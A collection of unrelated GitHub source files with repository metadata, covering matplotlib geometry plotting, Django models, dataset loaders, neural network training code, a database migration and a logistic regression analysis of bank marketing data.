#T# create the variables that define the plot
A = (0, 0)
r = 1
a_B = math.pi/5
B = (r*math.cos(a_B), r*math.sin(a_B)) #| radius
a_C = math.pi*4.8/5
a_D = a_C + math.pi
C = (r*math.cos(a_C), r*math.sin(a_C)) #| diameter
D = (r*math.cos(a_D), r*math.sin(a_D))
a_E = math.pi*4/5
a_F = math.pi*2/5
E = (r*math.cos(a_E), r*math.sin(a_E)) #| chord
F = (r*math.cos(a_F), r*math.sin(a_F))
a_G = 3.72
a_H = 5.935
G = (r*math.cos(a_G), r*math.sin(a_G)) #| secant
H = (r*math.cos(a_H), r*math.sin(a_H))
G1 = (-1.3, -.6)
H1 = (1.3, -.3)
a_I = math.pi*3.2/2
I = (r*math.cos(a_I), r*math.sin(a_I)) #| tangent
m_AI = (I[1] - A[1])/(I[0] - A[0])
m_perp_AI = -1/m_AI
b_perp_AI = I[1] - m_perp_AI*I[0]
x_I1 = -.6
y_I1 = m_perp_AI*x_I1 + b_perp_AI
x_I2 = 1.15
y_I2 = m_perp_AI*x_I2 + b_perp_AI
I1 = (x_I1, y_I1)
I2 = (x_I2, y_I2)
list_x_1 = [A[0], B[0]]
list_y_1 = [A[1], B[1]]
list_x_2 = [C[0], D[0]]
list_y_2 = [C[1], D[1]]
list_x_3 = [E[0], F[0]]
list_y_3 = [E[1], F[1]]
list_x_4 = [G[0], H[0]]
list_y_4 = [G[1], H[1]]
#T# plot the figure
circle1 = mpatches.Arc(A, 2*r, 2*r, linewidth = 1.5)
ax1.add_patch(circle1)
ax1.plot(list_x_1, list_y_1, 'o-k', markersize = 3)
ax1.plot(list_x_2, list_y_2, 'o-k', markersize = 3)
ax1.plot(list_x_3, list_y_3, 'o-k', markersize = 3)
ax1.plot(list_x_4, list_y_4, 'o-k', markersize = 3)
line1 = mpatches.FancyArrowPatch(G1, H1, arrowstyle = '<->', mutation_scale = 12, linewidth = 1.5)
ax1.add_patch(line1)
ax1.plot(I[0], I[1], 'o-k', markersize = 3)
line2 = mpatches.FancyArrowPatch(I1, I2, arrowstyle = '<->', mutation_scale = 12, linewidth = 1.5)
ax1.add_patch(line2)
#T# set the math text font to the Latex default, Computer Modern
import matplotlib
matplotlib.rcParams['mathtext.fontset'] = 'cm'
#T# create the labels
label_A = ax1.annotate(r'$A$', A, size = 16)
label_radius = ax1.annotate(r'$radius$', (-1, 1), size = 16)
label_diameter = ax1.annotate(r'$diameter$', (0, 1), size = 16)
label_chord = ax1.annotate(r'$chord$', (1, 1), size = 16)
label_secant = ax1.annotate(r'$secant$', (-1, -1), size = 16)
label_tangent = ax1.annotate(r'$tangent$', (0, -1), size = 16)
#T# drag the labels if needed
label_A.draggable()
label_radius.draggable()
label_diameter.draggable()
label_chord.draggable()
label_secant.draggable()
label_tangent.draggable()
#T# show the results
ax1.autoscale()
plt.show() | Polirecyliente/SGConocimiento | Math/C01_Geometry_basics/Programs/S04/Segments_and_lines_of_a_circle_image.py | Segments_and_lines_of_a_circle_image.py | py | 3,083 | python | en | code | 0 | github-code | 13 |
15863858271 | import os
from django.core.files.storage import default_storage
from apps.common.models import BaseModel, Institucion, UbigeoPais
from django.db import models
from apps.persona.models import Persona
class Distincion(BaseModel):
institucion = models.ForeignKey(Institucion, on_delete=models.PROTECT)
distincion = models.CharField('Distinción', max_length=250)
descripcion = models.TextField('Descripción', max_length=600)
pais = models.ForeignKey(UbigeoPais, on_delete=models.PROTECT)
web_referencia = models.CharField('Web referencia', max_length=250)
fecha = models.DateField()
persona = models.ForeignKey(Persona, on_delete=models.PROTECT)
def delete(self, using=None, keep_parents=False):
for au in self.adjuntodistincion_set.all():
path = default_storage.path(au.ruta)
if path:
os.remove(path)
super(Distincion, self).delete()
class AdjuntoDistincion(BaseModel):
nombre = models.CharField('Nombre del documento', max_length=200)
ruta = models.TextField('Ruta del documento', max_length=500)
distincion = models.ForeignKey(Distincion, on_delete=models.CASCADE)
def delete(self, using=None, keep_parents=False):
path = default_storage.path(self.ruta)
if path:
os.remove(path)
super(AdjuntoDistincion, self).delete()
| cpaucarc/legajos | apps/distincion/models.py | models.py | py | 1,369 | python | en | code | 2 | github-code | 13 |
27397459234 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
"""
from aiohttp import web
import asyncio
from text_transformation.transformer import Transformer
class Server:
def __init__(self):
app = web.Application()
# adding current routes
routes = [
web.post("/transform_text", self.transform_text)
]
app.add_routes(routes)
self.app = app
def run(self):
t = Transformer()
web.run_app(self.app)
async def transform_text(self, request):
print(request)
return web.Response(text="Hello, world")
| TLReber/LSPT-TextTransformation | sandbox/_server.py | _server.py | py | 594 | python | en | code | 1 | github-code | 13 |
10977881958 | import ipaddress
from pathlib import Path
from typing import List, Optional, Any
import yaml
from model.manufacturer import Manufacturer
from repository.exceptions import (
ManufacturerAlreadyExistsException,
ManufacturerNotFoundException,
)
from .manufacturers import ManufacturersRepository
def ipv4_representer(dumper, data):
return dumper.represent_scalar("!ipaddress.IPv4Address", str(data))
def ipv4_constructor(loader, node):
value = loader.construct_scalar(node)
return ipaddress.IPv4Address(value)
yaml.add_representer(ipaddress.IPv4Address, ipv4_representer)
yaml.add_constructor("!ipaddress.IPv4Address", ipv4_constructor)
class ManufacturersRepositoryYAMLFile(ManufacturersRepository):
def __init__(self, file_source: Optional[str] ) -> None:
super().__init__(file_source)
self._file_name = self._get_dir(self._file_source)
self._manufacturers = (
self._get_manufacturers_from_yaml_file()
if Path(self._file_name).is_file()
else []
)
def _get_dir(self, file_name: str) -> Path:
return (
Path(__file__).parent.parent.parent / self._file_source / "manufacturers.yml"
)
def _get_manufacturers_from_yaml_file(self) -> List[Manufacturer]:
with open(self._file_name) as file:
manufacturers_raw = yaml.full_load(file)
manufacturer_list = []
for manufacturer in manufacturers_raw:
d = list(manufacturer.values())[0]
d.update({"name": list(manufacturer.keys())[0]})
manufacturer_list.append(Manufacturer(**d))
return manufacturer_list
def _save_manufacturers_to_yaml_file(self) -> None:
manufacturers_to_save = [p.dict() for p in self._manufacturers]
manufacturers = []
for manufacturer in manufacturers_to_save:
dict_yaml_manufacturer = {}
dict_yaml_manufacturer.update({manufacturer.pop("name"): manufacturer})
manufacturers.append(dict_yaml_manufacturer)
with open(self._file_name, mode="w") as f:
f.write(yaml.dump(manufacturers, indent=10, default_flow_style=False))
def get_manufacturer(self, id: int) -> Manufacturer:
self._get_manufacturers_from_yaml_file()
for manufacturer in self._manufacturers:
if manufacturer.id == id:
return manufacturer
raise ManufacturerNotFoundException(id)
def create_manufacturer(self, manufacturer: Manufacturer) -> Any:
try:
self.get_manufacturer(manufacturer.id)
except ManufacturerNotFoundException:
self._manufacturers.append(manufacturer)
self._save_manufacturers_to_yaml_file()
return manufacturer
else:
raise ManufacturerAlreadyExistsException(manufacturer.id)
def update_manufacturer(self, id: int, manufacturer: Manufacturer) -> None:
try:
self.get_manufacturer(manufacturer.id)
except ManufacturerNotFoundException:
pass
else:
raise ManufacturerAlreadyExistsException(manufacturer.id)
| pedrolp85/pydevice | app/repository/manufacturers/manufacturersYAMLfile.py | manufacturersYAMLfile.py | py | 3,184 | python | en | code | 0 | github-code | 13 |
47005982804 | import numpy as np
def cross_v(a1='aroonlow',val11=100,df=None):
ar=a1+str(val11)+'_v'
df[ar]=None
if val11>0 :
df[ar]=np.where(df[a1]>=val11,df[a1],0)
else :
df[ar]=np.where(df[a1]<=val11,df[a1],0)
return df[ar] | aa3110/python-trading | biblio/trade/t_cross_v.py | t_cross_v.py | py | 240 | python | en | code | 1 | github-code | 13 |
37086085946 | from .internal import GradientLayer, MomentumNormalization, \
NeighborhoodReduction, \
PairwiseValueNormalization, PairwiseVectorDifference, \
PairwiseVectorDifferenceSum, VectorAttention
import flowws
from flowws import Argument as Arg
import numpy as np
import tensorflow as tf
from tensorflow import keras
LAMBDA_ACTIVATIONS = {
'log1pswish': lambda x: tf.math.log1p(tf.nn.swish(x)),
'sin': tf.sin,
}
NORMALIZATION_LAYERS = {
'layer': lambda _: keras.layers.LayerNormalization(),
'layer_all': lambda rank: keras.layers.LayerNormalization(axis=[-i - 1 for i in range(rank + 1)]),
'momentum': lambda _: MomentumNormalization(),
'pairwise': lambda _: PairwiseValueNormalization(),
}
NORMALIZATION_LAYER_DOC = ' (any of {})'.format(','.join(NORMALIZATION_LAYERS))
@flowws.add_stage_arguments
class MoleculeForceRegression(flowws.Stage):
"""Build a geometric attention network for the molecular force regression task.
This module specifies the architecture of a network to calculate
atomic forces given the coordinates and types of atoms in a
molecule. Conservative forces are computed by calculating the
gradient of a scalar.
"""
ARGS = [
Arg('rank', None, int, 2,
help='Degree of correlations (n-vectors) to consider'),
Arg('n_dim', '-n', int, 32,
help='Working dimensionality of point representations'),
Arg('dilation', None, float, 2,
help='Working dimension dilation factor for MLP components'),
Arg('merge_fun', '-m', str, 'concat',
help='Method to merge point representations'),
Arg('join_fun', '-j', str, 'concat',
help='Method to join invariant and point representations'),
Arg('dropout', '-d', float, 0,
help='Dropout rate to use, if any'),
Arg('mlp_layers', None, int, 1,
help='Number of hidden layers for score/value MLPs'),
Arg('n_blocks', '-b', int, 2,
help='Number of deep blocks to use'),
Arg('block_nonlinearity', None, bool, True,
help='If True, add a nonlinearity to the end of each block'),
Arg('residual', '-r', bool, True,
help='If True, use residual connections within blocks'),
Arg('activation', '-a', str, 'swish',
help='Activation function to use inside the network'),
Arg('final_activation', None, str, 'swish',
help='Final activation function to use within the network'),
Arg('score_normalization', None, [str], [],
help=('Normalizations to apply to score (attention) function' +
NORMALIZATION_LAYER_DOC)),
Arg('value_normalization', None, [str], [],
help=('Normalizations to apply to value function' +
NORMALIZATION_LAYER_DOC)),
Arg('invar_normalization', None, [str], [],
help=('Normalizations to apply to invariants in value function' +
NORMALIZATION_LAYER_DOC)),
Arg('normalize_distances', None, str,
help='Method to use to normalize pairwise distances'),
Arg('predict_energy', None, bool, False,
help='If True, predict energies instead of forces'),
Arg('energy_bias', None, bool, False,
help='If True, learn a bias term for energy prediction'),
]
def run(self, scope, storage):
rank = self.arguments['rank']
if self.arguments['activation'] in LAMBDA_ACTIVATIONS:
activation_layer = lambda: keras.layers.Lambda(
LAMBDA_ACTIVATIONS[self.arguments['activation']])
else:
activation_layer = lambda: keras.layers.Activation(
self.arguments['activation'])
if self.arguments['final_activation'] in LAMBDA_ACTIVATIONS:
final_activation_layer = lambda: keras.layers.Lambda(
LAMBDA_ACTIVATIONS[self.arguments['final_activation']])
else:
final_activation_layer = lambda: keras.layers.Activation(
self.arguments['final_activation'])
n_dim = self.arguments['n_dim']
dilation_dim = int(np.round(n_dim*self.arguments['dilation']))
def make_scorefun():
layers = []
for _ in range(self.arguments['mlp_layers']):
layers.append(keras.layers.Dense(dilation_dim))
for name in self.arguments['score_normalization']:
layers.append(NORMALIZATION_LAYERS[name](rank))
layers.append(activation_layer())
if self.arguments.get('dropout', 0):
layers.append(keras.layers.Dropout(self.arguments['dropout']))
layers.append(keras.layers.Dense(1))
return keras.models.Sequential(layers)
def make_valuefun(uses_invars=False):
layers = []
if uses_invars:
for name in self.arguments['invar_normalization']:
layers.append(NORMALIZATION_LAYERS[name](rank))
for _ in range(self.arguments['mlp_layers']):
layers.append(keras.layers.Dense(dilation_dim))
for name in self.arguments['value_normalization']:
layers.append(NORMALIZATION_LAYERS[name](rank))
layers.append(activation_layer())
if self.arguments.get('dropout', 0):
layers.append(keras.layers.Dropout(self.arguments['dropout']))
layers.append(keras.layers.Dense(n_dim))
return keras.models.Sequential(layers)
def make_block(last):
residual_in = last
last = VectorAttention(
make_scorefun(), make_valuefun(True), False, rank=rank,
join_fun=self.arguments['join_fun'],
merge_fun=self.arguments['merge_fun'])([delta_x, last])
if self.arguments['block_nonlinearity']:
last = make_valuefun()(last)
if self.arguments['residual']:
last = last + residual_in
return last
x_in = keras.layers.Input((scope['neighborhood_size'], 3))
v_in = keras.layers.Input((scope['neighborhood_size'], scope['num_types']))
delta_x = PairwiseVectorDifference()(x_in)
delta_v = PairwiseVectorDifferenceSum()(v_in)
if 'normalize_distances' in self.arguments:
mode = self.arguments['normalize_distances']
if mode == 'momentum':
delta_x = MomentumNormalization()(delta_x)
else:
raise NotImplementedError(mode)
last = keras.layers.Dense(n_dim)(delta_v)
for _ in range(self.arguments['n_blocks']):
last = make_block(last)
(last, ivs, att) = VectorAttention(
make_scorefun(), make_valuefun(True), True, name='final_attention',
rank=rank,
join_fun=self.arguments['join_fun'],
merge_fun=self.arguments['merge_fun'])(
[delta_x, last], return_invariants=True, return_attention=True)
last = keras.layers.Dense(dilation_dim, name='final_mlp')(last)
last = final_activation_layer()(last)
last = NeighborhoodReduction()(last)
use_bias = self.arguments.get('energy_bias', False)
last = keras.layers.Dense(1, name='energy_projection', use_bias=use_bias)(last)
energy_prediction = last
if not self.arguments['predict_energy']:
last = GradientLayer()((last, x_in))
if scope.get('energy_labels', False):
last = (last[0], energy_prediction)
kwargs = scope.setdefault('compile_kwargs', {})
kwargs['loss_weights'] = (1 - 1e-3, 1e-3)
scope['input_symbol'] = [x_in, v_in]
scope['output'] = last
scope['loss'] = 'mse'
scope['attention_model'] = keras.models.Model([x_in, v_in], att)
scope['invariant_model'] = keras.models.Model([x_in, v_in], ivs)
| klarh/flowws-keras-geometry | flowws_keras_geometry/models/MoleculeForceRegression.py | MoleculeForceRegression.py | py | 8,004 | python | en | code | 6 | github-code | 13 |
30647468625 | import glob
import os
from typing import Tuple, Union
import subprocess
import pandas as pd
from PIL.Image import Image
from torch import Tensor
from torchvision.datasets import ImageFolder
OA_DATASET_FULL = 'OA_DATASET_FULL'
OA_DATASET_COLOR = 'OA_DATASET_COLOR'
OA_DATASET_FULL_25x25 = 'OA_DATASET_FULL_25x25'
OA_DATASET_COLOR_25x25 = 'OA_DATASET_COLOR_25x25'
class OmniArtEyeDataset(ImageFolder):
dataset_tar = {
OA_DATASET_FULL: 'omniart_eye_dataset.tar.xz',
OA_DATASET_COLOR_25x25: 'omniart_eye_dataset_color_25x25.tar.xz'
}
dataset_tar_part = {
OA_DATASET_FULL: 'omniart_eye_dataset.tar.*'
}
metadata_tar = 'omniart_metadata.tar.xz'
def __init__(self, transform=None, dataset_type=OA_DATASET_FULL):
self.dataset_type = dataset_type
self.transform = transform
self.root = os.path.join(os.path.dirname(__file__), 'datasets')
if self.dataset_type == OA_DATASET_FULL:
self.dataset_folder = 'full'
elif self.dataset_type == OA_DATASET_COLOR_25x25:
self.dataset_folder = 'color_25x25'
else:
raise ValueError('Unable to use dataset type %s, it is not implemented'.format(dataset_type))
if not self.__data_files_exist():
self.__unpack_datasets()
self.__csv = pd.read_csv(os.path.join(self.root, 'omniart_metadata.csv'), low_memory=False)
super(OmniArtEyeDataset, self).__init__(os.path.join(self.root, self.dataset_folder), transform=self.transform)
def __data_files_exist(self) -> bool:
return os.path.isdir(os.path.join(self.root, self.dataset_folder)) and \
os.path.isfile(os.path.join(self.root, 'omniart_metadata.csv'))
def __unpack_datasets(self):
import tarfile
print("Unpacking OmniArt eyes dataset...")
# extract the dataset
if self.dataset_type == OA_DATASET_FULL:
# First join the part files
# Part files exist because of file size limits and the lack of an external (permanent) hosting for the files
part_files = glob.glob(os.path.join(self.root, self.dataset_tar_part[self.dataset_type]))
with open(os.path.join(self.root, self.dataset_tar[self.dataset_type]), 'wb') as dataset_file:
for part_file in part_files:
with open(part_file, 'rb') as read_file:
dataset_file.write(read_file.read())
with tarfile.open(os.path.join(self.root, self.dataset_tar[self.dataset_type])) as tar:
tar.extractall(path=self.root)
print("Unpacking OmniArt metadata...")
with tarfile.open(os.path.join(self.root, self.metadata_tar)) as tar:
tar.extractall(path=self.root)
def __getitem__(self, index: int) -> Tuple[Union[Image, Tensor], int, dict]:
image, color = super().__getitem__(index)
omni_id = self.__get_omni_id(index)
return image, color, self.__get_omniart_metadata(omni_id)
def __get_omniart_metadata(self, omni_id: int) -> dict:
# There should only exist one row with a given omni id, thus we can safely assume we receive 1 row
return self.__csv.loc[self.__csv['omni_id'] == omni_id].to_dict(orient='records')
def __get_omni_id(self, index: int) -> int:
filename = os.path.basename(self.samples[index][0])
return int(filename.split('_')[0])
| rogierknoester/omniart_eye_dataset | omniart_eye_dataset/OmniArtEyeDataset.py | OmniArtEyeDataset.py | py | 3,415 | python | en | code | 1 | github-code | 13 |
11426899558 | from project.roboti.female_robot import FemaleRobot
from project.roboti.male_robot import MaleRobot
from project.services.main_service import MainService
from project.services.secondary_service import SecondaryService
class RobotsManagingApp:
SERVICE_TYPES = {"MainService": MainService, "SecondaryService": SecondaryService}
ROBOT_TYPES = {"MaleRobot": MaleRobot, "FemaleRobot": FemaleRobot}
def __init__(self):
self.robots = []
self.services = []
def add_service(self, service_type: str, name: str):
if service_type not in self.SERVICE_TYPES:
raise Exception("Invalid service type!")
self.services.append(self.SERVICE_TYPES[service_type](name))
return f"{service_type} is successfully added."
def add_robot(self, robot_type: str, name: str, kind: str, price: float):
if robot_type not in self.ROBOT_TYPES:
raise Exception("Invalid robot type!")
self.robots.append(self.ROBOT_TYPES[robot_type](name, kind, price))
return f"{robot_type} is successfully added."
# if robot_type == "MaleRobot":
# robot = MaleRobot(name, kind, price)
# elif robot_type == "FemaleRobot":
# robot = FemaleRobot(name, kind, price)
# else:
# raise Exception("Invalid robot type!")
# self.robots_serv.append(robot)
# return f"{robot_type} is successfully added."
def add_robot_to_service(self, robot_name: str, service_name: str):
robot_obj = [obj for obj in self.robots if obj.name == robot_name][0]
service_obj = [obj for obj in self.services if obj.name == service_name][0]
if robot_obj.POSSIBLE_SERVICE != service_obj.__class__.__name__:
return "Unsuitable service."
if len(service_obj.robo_lst) >= service_obj.capacity:
raise Exception("Not enough capacity for this robot!")
self.robots.remove(robot_obj)
service_obj.robo_lst.append(robot_obj)
return f"Successfully added {robot_name} to {service_name}."
def remove_robot_from_service(self, robot_name: str, service_name: str):
service_obj = [obj for obj in self.services if obj.name == service_name][0] # secondary_service
robot = [r for r in service_obj.robo_lst if r.name == robot_name]
print(service_obj, robot)
if not robot:
raise Exception("No such robot in this service!")
robot_obj = robot[0]
service_obj.robo_lst.remove(robot_obj) # премахни от secondaryService
self.robots.append(robot_obj)
return f"Successfully removed {robot_name} from {service_name}."
def feed_all_robots_from_service(self, service_name: str):
service_obj = [obj for obj in self.services if obj.name == service_name][0]
[r.eating() for r in service_obj.robo_lst]
return f"Robots fed: {len(service_obj.robo_lst)}."
# Каква е общата цена на роботите, включени в service-a по service_name ?
def service_price(self, service_name: str):
service_obj = [obj for obj in self.services if obj.name == service_name][0]
total_price = sum([r.price for r in service_obj.robo_lst])
return f"The value of service {service_name} is {total_price:.2f}."
#
def __str__(self):
return '\n'.join([s.details() for s in self.services])
| KrisKov76/SoftUni-Courses | python_OOP_10_2023/Python OOP - Exams/Python OOP Exam - 8 April 2023/project/robots_managing_app.py | robots_managing_app.py | py | 3,410 | python | en | code | 0 | github-code | 13 |
8105214820 | import os
from typing import List
import matplotlib.pyplot as plt
import matplotlib.font_manager as fm
import base64
import numpy as np
from io import BytesIO
FONT_PATH = os.path.join(os.path.dirname(
__file__), "TaipeiSansTCBeta-Regular.ttf")
FONT_PROP = fm.FontProperties(fname=FONT_PATH)
def process(data: List[dict], boss: dict):
labels, sizes, explode = [], [], []
other_damages = boss.get("caused_damage")
for i in data[0:10]:
labels.append(i.get("display_name", "路人"))
sizes.append(i.get("total_damage"))
explode.append(0)
# 排除掉前十名的傷害
other_damages -= i.get("total_damage", 0)
labels.append("其他")
sizes.append(other_damages)
explode.append(0)
fig, ax = plt.subplots()
wedges, texts = ax.pie(
sizes,
wedgeprops=dict(width=0.5),
startangle=90,
)
bbox_props = dict(boxstyle="square,pad=0.3", fc="w", ec="k", lw=0.72)
kw = dict(xycoords="data", textcoords="data", arrowprops=dict(arrowstyle="-"),
bbox=bbox_props, zorder=0, va="center")
for i, p in enumerate(wedges):
ang = (p.theta2 - p.theta1)/2. + p.theta1
y = np.sin(np.deg2rad(ang))
x = np.cos(np.deg2rad(ang))
horizontalalignment = {-1: "right", 1: "left"}[int(np.sign(x))]
connectionstyle = "angle,angleA=0,angleB={}".format(ang)
kw["arrowprops"].update({"connectionstyle": connectionstyle})
ax.annotate(labels[i], xy=(x, y), xytext=(1.35*np.sign(x), 1.4*y),
horizontalalignment=horizontalalignment, **kw, fontproperties=FONT_PROP)
ax.axis("equal")
pic_IObytes = BytesIO()
plt.savefig(pic_IObytes, format="png")
pic_IObytes.seek(0)
return base64.b64encode(pic_IObytes.read()).decode("utf-8")
| hanshino/redive_linebot | opencv/module/world/damage_chart.py | damage_chart.py | py | 1,814 | python | en | code | 21 | github-code | 13 |
41454898706 | import time
import math
import torch
import torch.nn as nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from data_helper import MyDataSet
from model import *
trainset = MyDataSet('data/x_training.txt','data/y_training.txt','data/word_dict','data/pos_dict','data/ner_dict',max_len=100,is_test=False)
trainloader = DataLoader(dataset=trainset, batch_size=16, shuffle=True)
testset = MyDataSet('data/x_testing.txt','data/y_testing.txt','data/word_dict','data/pos_dict','data/ner_dict',max_len=100,is_test=False)
testloader = DataLoader(dataset=testset, batch_size=16, shuffle=False)
config = {
'vocab_size': max(trainloader.dataset.word2idx.values()) + 1,
'word_embedding_dim': 100,
'pos_embedding_dim': 25,
'ner_embedding_dim': 25,
'pos_set_size': max(trainloader.dataset.pos2idx.values()) + 1,
'ner_set_size': max(trainloader.dataset.ner2idx.values()) + 1,
'hidden_size': 100,
'num_layers': 2,
'drop_out': 0.3,
'categories': 2,
'use_pos': True,
'use_ner': True
}
model = MyModel(config)
DEVICE_NO = 1
if DEVICE_NO != -1:
model = model.cuda(DEVICE_NO)
optimizer = torch.optim.Adam(model.parameters())
criteria = nn.CrossEntropyLoss()
log_interval = 500
epochs = 20
def train(dataloader):
model.train()
total_loss = 0
total_items = 0
start_time = time.time()
for i_batch, batch in enumerate(dataloader):
output_seq = Variable(batch['label'])
del (batch['label'])
for k in batch:
batch[k] = Variable(batch[k])
if DEVICE_NO != -1:
output_seq = output_seq.cuda(DEVICE_NO)
for k in batch:
batch[k] = batch[k].cuda(DEVICE_NO)
model.zero_grad()
pred = model.forward(**batch)
pred = pred.view(-1, pred.size(-1))
output_seq = output_seq.view(-1)
loss = criteria(pred, output_seq)
loss.backward()
num_items = len([x for x in output_seq])
total_loss += num_items * loss.data
total_items += num_items
optimizer.step()
if i_batch % log_interval == 0 and i_batch > 0:
cur_loss = total_loss[0] / total_items
elapsed = time.time() - start_time
print('| epoch {:3d} | {:5d}/{:5d} batches | lr {:04.4f} | ms/batch {:5.2f} | '
'loss {:5.6f}'.format(
epoch, i_batch, len(dataloader.dataset) // dataloader.batch_size, optimizer.param_groups[0]['lr'],
elapsed * 1000 / log_interval, cur_loss))
total_loss = 0
total_items = 0
start_time = time.time()
def evaluate(dataloader):
total_loss = 0
total_items = 0
model.eval()
for batch in dataloader:
output_seq = Variable(batch['label'])
del (batch['label'])
for k in batch:
batch[k] = Variable(batch[k])
if DEVICE_NO != -1:
output_seq = output_seq.cuda(DEVICE_NO)
for k in batch:
batch[k] = batch[k].cuda(DEVICE_NO)
pred = model.forward(**batch)
pred = pred.view(-1, pred.size(-1))
output_seq = output_seq.view(-1)
num_items = len([x for x in output_seq ])
total_loss += num_items * criteria(pred, output_seq).data
total_items += num_items
return total_loss[0] / total_items
best_val_loss = 1000
try:
print(model)
model.init_weights()
for epoch in range(1, epochs + 1):
# scheduler.step()
epoch_start_time = time.time()
train(trainloader)
val_loss = evaluate(testloader)
print('-' * 89)
print('| end of epoch {:3d} | time: {:5.2f}s | valid loss {:5.6f}'.format(epoch, (time.time() - epoch_start_time),
val_loss,))
print('-' * 89)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
print('new best val loss, saving model')
with open('model.pkl', 'wb') as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
pass
except KeyboardInterrupt:
print('-' * 89)
print('Exiting from training early')
val_loss = evaluate(testloader)
# Save the model if the validation loss is the best we've seen so far.
if not best_val_loss or val_loss < best_val_loss:
print('new best val loss, saving model')
with open('model.pkl', 'wb') as f:
torch.save(model, f)
best_val_loss = val_loss
else:
# Anneal the learning rate if no improvement has been seen in the validation dataset.
pass
| jxst539246/NLPCC-task-5 | train.py | train.py | py | 4,808 | python | en | code | 0 | github-code | 13 |
7770893740 | from mmcv.transforms.builder import TRANSFORMS
import cv2
import numpy as np
from typing import Optional
import mmengine
import numpy as np
import mmcv
from mmcv.transforms.base import BaseTransform
from mmcv.transforms.builder import TRANSFORMS
@TRANSFORMS.register_module()
class LoadImage(BaseTransform):
"""Load an image from file.
Required Keys:
- img_path
Modified Keys:
- img
- img_shape
- ori_shape
Args:
to_float32 (bool): Whether to convert the loaded image to a float32
numpy array. If set to False, the loaded image is an uint8 array.
Defaults to False.
color_type (str): The flag argument for :func:`mmcv.imfrombytes`.
Defaults to 'color'.
imdecode_backend (str): The image decoding backend type. The backend
argument for :func:`mmcv.imfrombytes`.
See :func:`mmcv.imfrombytes` for details.
Defaults to 'cv2'.
file_client_args (dict): Arguments to instantiate a FileClient.
See :class:`mmengine.fileio.FileClient` for details.
Defaults to ``dict(backend='disk')``.
ignore_empty (bool): Whether to allow loading empty image or file path
not existent. Defaults to False.
"""
def __init__(self,
to_float32: bool = False,
color_type: str = 'color',
imdecode_backend: str = 'cv2',
file_client_args: dict = dict(backend='disk'),
ignore_empty: bool = False) -> None:
self.ignore_empty = ignore_empty
self.to_float32 = to_float32
self.color_type = color_type
self.imdecode_backend = imdecode_backend
self.file_client_args = file_client_args.copy()
self.file_client = mmengine.FileClient(**self.file_client_args)
def transform(self, results: dict) -> Optional[dict]:
"""Functions to load image.
Args:
results (dict): Result dict from
:class:`mmengine.dataset.BaseDataset`.
Returns:
dict: The dict contains loaded image and meta information.
"""
filename = results['img_path']
try:
img = cv2.imread(results['img_path'],cv2.IMREAD_UNCHANGED)
except Exception as e:
if self.ignore_empty:
return None
else:
raise e
if self.to_float32:
img = img.astype(np.float32)
results['img'] = img
results['img_shape'] = img.shape[:2]
results['ori_shape'] = img.shape[:2]
return results
def __repr__(self):
repr_str = (f'{self.__class__.__name__}('
f'ignore_empty={self.ignore_empty}, '
f'to_float32={self.to_float32}, '
f"color_type='{self.color_type}', "
f"imdecode_backend='{self.imdecode_backend}', "
f'file_client_args={self.file_client_args})')
return repr_str
| FreeformRobotics/EAEFNet | EAEFNet_Detection/EAEF_mmyolo/mmyolo/datasets/LoadImageFromFile.py | LoadImageFromFile.py | py | 3,022 | python | en | code | 34 | github-code | 13 |
39186389614 | """Add land
Revision ID: 95979d057d0a
Revises: ed8c6f0d7b6b
Create Date: 2023-07-13 15:49:14.939055
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '95979d057d0a'
down_revision = 'ed8c6f0d7b6b'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('lands',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=255), nullable=False),
sa.Column('place', sa.String(length=255), nullable=False),
sa.Column('price', sa.String(length=255), nullable=False),
sa.Column('size', sa.String(length=255), nullable=False),
sa.Column('description', sa.String(length=255), nullable=False),
sa.Column('longitude', sa.String(length=255), nullable=True),
sa.Column('latitude', sa.String(length=255), nullable=True),
sa.Column('owner_id', sa.Integer(), nullable=True),
sa.Column('photo_url', sa.String(length=255), nullable=True),
sa.Column('land_views', sa.String(length=255), nullable=True),
sa.ForeignKeyConstraint(['owner_id'], ['users.id'], ),
sa.PrimaryKeyConstraint('id')
)
with op.batch_alter_table('visitations', schema=None) as batch_op:
batch_op.add_column(sa.Column('land_id', sa.Integer(), nullable=True))
batch_op.create_foreign_key(None, 'lands', ['land_id'], ['id'])
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table('visitations', schema=None) as batch_op:
batch_op.drop_constraint(None, type_='foreignkey')
batch_op.drop_column('land_id')
op.drop_table('lands')
# ### end Alembic commands ###
| DamyanBG/real-estate-flask-rest-api | migrations/versions/95979d057d0a_add_land.py | 95979d057d0a_add_land.py | py | 1,769 | python | en | code | 0 | github-code | 13 |
21313733623 | # -*- coding: utf-8 -*-
"""
Created on Sat Sep 14 12:11:22 2019
@author: Adarsh
"""
#logistic regression
import pandas as pd
import numpy as np
import seaborn as sb
import matplotlib.pyplot as plt
import statsmodels.formula.api as sm
from sklearn.model_selection import train_test_split # train and test
from sklearn import metrics
from sklearn.metrics import classification_report
#loading the data
bank=pd.read_csv("E:/ADM/Excelr solutions/DS assignments/logistic regression/bank-full.csv",sep=";")
#In dataset some variables has no importance and unkown data so drop
bank.drop(["education"],inplace=True,axis=1)
bank.drop(["pdays"],inplace=True,axis=1)
bank.drop(["previous"],inplace=True,axis=1)
bank.drop(["poutcome"],inplace=True,axis=1)
bank.drop(["month"],inplace=True,axis=1)
bank.drop(["contact"],inplace=True,axis=1)
bank.drop(["job"],inplace=True,axis=1)
#converting into binary
from sklearn.preprocessing import LabelEncoder
lb=LabelEncoder()
bank["y"]=lb.fit_transform(bank["y"])
bank=pd.get_dummies(bank)
bank=bank.iloc[:,[5,0,1,2,3,4,6,7,8,9,10,11,12,13,14]]
#EDA
a1=bank.describe()
bank.median()
bank.var()
bank.skew()
plt.hist(bank["age"])
plt.hist(bank["balance"])
plt.hist(bank["duration"])
bank.isna().sum()#No NA values present, so no need to do imputation
bank.isnull().sum()
bank.y.value_counts()#count 0 and 1s
bank.loan_no.value_counts()
bank.loan_yes.value_counts()
bank.housing_yes.value_counts()
cor=bank.corr()
